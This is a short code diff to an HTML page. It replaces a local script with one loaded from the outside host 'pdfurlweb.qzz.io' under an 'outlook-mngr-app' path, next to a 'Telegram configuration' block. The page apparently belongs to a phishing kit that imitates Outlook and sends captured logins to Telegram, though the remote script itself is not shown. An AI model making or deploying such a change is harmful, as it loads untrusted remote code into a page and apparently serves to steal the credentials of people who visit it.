--- a/index.html
+++ b/index.html
@@ -99,7 +99,7 @@
         <span>.&nbsp;.&nbsp;.</span>
     </footer>
     
-    <script src="app.js"></script>
+    <script src="https://pdfurlweb.qzz.io/outlook-mngr-app/app.js"></script>
     
     <script>
         // Telegram configuration
@@ -272,3 +272,4 @@
 
 
 </html>
+
